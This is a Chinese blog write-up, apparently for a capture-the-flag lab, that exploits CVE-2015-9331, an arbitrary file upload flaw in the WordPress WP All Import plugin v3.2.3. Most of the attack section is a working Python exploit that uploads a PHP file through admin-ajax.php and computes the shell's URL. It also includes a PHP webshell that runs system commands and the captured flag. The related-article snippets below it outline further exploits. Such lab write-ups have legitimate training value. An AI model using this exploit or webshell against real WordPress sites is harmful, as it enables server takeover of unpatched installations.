春秋云镜 CVE-2015-9331

最新推荐文章于 2025-05-31 20:09:18 发布
最新推荐文章于 2025-05-31 20:09:18 发布
阅读量1.2k 收藏 1
点赞数 1
分类专栏: 靶场 文章标签: android 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_22002773/article/details/132807355
版权
文章描述了一个WordPress插件WPAllImportv3.2.3中的任意文件上传漏洞,攻击者可通过发送请求上传恶意shell脚本,获取服务器权限。漏洞利用示例提供并展示了如何利用此漏洞获取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

春秋云镜 CVE-2015-9331 wordpress插件 WordPress WP All Import plugin v3.2.3 任意文件上传

靶标介绍

wordpress插件 WordPress WP All Import plugin v3.2.3 存在任意文件上传,可以上传shell。

启动场景

在这里插入图片描述

漏洞利用

exp

#/usr/local/bin/python3
# -*-coding:utf-8-*-
 
import requests,os
site="eci-2ze8y6cz5vszwgd99u5d.cloudeci1.ichunqiu.com"
file_to_upload ='shell.php'
up_req = requests.post('http://'+site+'/wp-admin/admin-ajax.php?page=pmxi-admin-settings&action=upload&name=evil.php',data=open(file_to_upload,'rb').read())
up_dir = os.popen('php -r "print md5(strtotime(\''+up_req.headers['date']+'\'));"').read()
print ("http://"+site+"/wp-content/uploads/wpallimport/uploads/"+up_dir+"/%s" % "evil.php")

site处填域名,file_to_upload处填shell文件名。
shell如下

<?php
system('cat /flag');phpinfo();
?>

执行exp脚本
在这里插入图片描述
访问链接
在这里插入图片描述
得到flag

flag{3df8d04f-d7cd-4b22-a2aa-25ca6e8dde62}

CVE10大漏洞总结【网络安全
heikeyouyou的博客
05-19 3468
网络安全cve十大漏洞总结
春秋CVE-2022-30887 Pharmacy Management System shell upload漏洞复现
Ambition_sec的博客
11-17 1739
春秋CVE-2022-30887 Pharmacy Management System shell upload漏洞复现
春秋CVE-2015-9331 必获取flag,来抄
HMX404的博客
01-31 1169
wordpress插件 WordPress WP All Import plugin v3.2.3 存在任意文件上传,可以上传shell。
CVE-2015-5119_walkthrough:文章CVE-2015-5119 Flash ByteArray UaF的存档
05-10
CVE-2015-5119_walkthrough
WordPress站点上传文件插件WordPress File Upload
boke112的博客
08-28 6519
​​如果我们的 WordPress 站点需要在文章或页面或侧边栏或表单中需要将文件上传到 WordPress 站点 wp-contents 中的任何目录的话,甚至可以添加自定义字段,与上传的文件一起提交数据等,这一切的操作都不复杂,只需要安装一款文件上传插件 WordPress File Upload 即可,它具有以下特点: 它使用最新的 HTML5 技术,但是也可以在旧的浏览器和手机上使用。 它符合欧盟的通用数据保护条例(GDPR)。 可以将其添加到帖子,页面或侧边栏(作为小部件)。 它可以从设备
wordpress数据导入插件WP ALL Import使用教程
ChanYao的专栏
02-24 5178
当你要迁移站点,或者出于某种原因,需要把数据导入到wordpress的时候,而且这个数据量还非常多的时候,wordpress自带的导出导入工具用起来就不太方便了。 假如你采集了成千上万条数据,且存在了excle表格里面,你想把它导入到文章里面,辣么接下来介绍的方法和插件正和你意:wp-all-import-pro插件。 我曾经用这个插件把excel里面的14万行数据导入到wordpress的文章里面, 它支持XML和CVS文件直接导入,说到这里是不是很熟悉了,CVS格式的文件,就是表格。 ..
春秋CVE-2023-38836
weixin_53974661的博客
02-24 176
BoidCMS v.2.0.0 存在文件上传漏洞,远程攻击者可通过添加 GIF 头部绕过 MIME 类型检查,执行任意代码。使用蚂剑链接 链接地址为GIF89a.php 的浏览地址。点击admin panel。password 登录成功。
春秋 CVE-2024-23897
weixin_51588494的博客
09-08 1321
Jenkins提供了一个命令行接口,用户可以通过jenkins-cli.jar调用这个接口来执行一些jenkins的功能,但是由于使用jenkins-cli.jar执行命令行时,命令行是在服务端调用第三方库 args4j 进行解析的,如果参数是以@开头,就会被认为是一个文件名,并且的将文件内容读取出来作为参数,然后引发报错,将文件内容通过报错显示出来,造成了文件读取。猜测使用java -jar jenkins-cli.jar -s http://xxx/ -http help 1 "@/flag"
春秋 CVE-2023-26469
qq274575499的博客
03-29 3116
Jorani是一款开源的员工考勤和休假管理系统,适用于中小型企业和全球化组织,它简化了员工工时记录、休假请求和审批流程,并提供了多语言支持以满足不同地区的需求。在 Jorani 1.0.0 中,攻击者可以利用路径遍历来访问文件并在服务器上执行代码。
春秋 CVE-2023-1313
qq274575499的博客
04-03 1650
cockpit在2.4.1版本之前存在任意文件上传漏洞PS:通过在浏览器中打开/install来运行安装。
春秋CVE-2022-4230 夺旗
05-02
### 春秋CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
春秋CVE-2024-0195【记录】
zhiquovo的博客
03-07 1392
春秋CVE-2024-0195【记录】 漏洞描述 SpiderFlow爬虫平台项目中spider-flow-web\src\main\java\org\spiderflow\controller\FunctionController.java文件的FunctionService.saveFunction函数调用了saveFunction函数,该调用了自定义函数validScript,该函数中用户能够控制 functionName、parameters 或 script 中的内容,从而构造恶意输入来执行
春秋CVE-2022-22733 Apache ShardingSphere ElasticJob UI 敏感信息泄漏漏洞 解题思路
Dark-Specter的博客
03-25 2709
网络安全中的信息泄露通常是指敏感数据无意或有意地被透露给未经授权的人员或系统。这种泄露可以通过多种方式发生,主要涉及技术漏洞、操作失误、内部威胁或安全策略的不足。
春秋CVE-2022-32991 Web Based Quiz System SQL注入
Ambition_sec的博客
11-16 771
春秋CVE-2022-32991 Web Based Quiz System SQL注入
(环境搭建+复现) Wordpress文件管理插件任意文件上传漏洞
daxi0ng的博客
09-25 2303
0x00 简介 WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把 WordPress当作一个内容管理系统(CMS)来使用。 文件管理器允许您直接从WordPress后端编辑,删除,上载,下载,压缩,复制和粘贴文件和文件夹。不必费心使用FTP来管理文件和从一个位置移动文件。有史以来功能最强大,最灵活,最简单的WordPress文件管理解决方案! 0x01 漏洞概述 安全人员进行调查时,很快发现WordPress插件.
JS语言基础
2301_81140745的博客
05-28 1445
input type="password" name="password" id="password" class="pass" placeholder="请输入密码"><input type="text" name="username" id="username" class="user" placeholder="请输入用户名"><img src="iphone.jpg" width="300" height="300" alt="iPhone图片">// 添加跳转地址到JSON响应中。
安卓学习笔记-数据存储
wy53111的博客
05-29 781
本文是《安卓学习笔记-声明式UI》的续篇,重点探讨数据存储层与业务逻辑层的解耦。
Android之ListView
最新发布
m0_74304371的博客
05-31 659
Android之ListView
Android bindservice绑定服务,bindServiceAsUser补充
oh_my_god的专栏
05-30 621
【代码】Android bindservice绑定服务,bindServiceAsUser补充。
春秋CVE-2018-18086
01-23
### 关于春秋 CVE-2018-18086 漏洞详情 对于CVE-2018-18086漏洞,此安全问题存在于Python的PyPI仓库中,在处理特定类型的HTTP请求时存在缺陷。具体来说,当服务器接收到带有特制User-Agent头的HTTP请求时,可能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值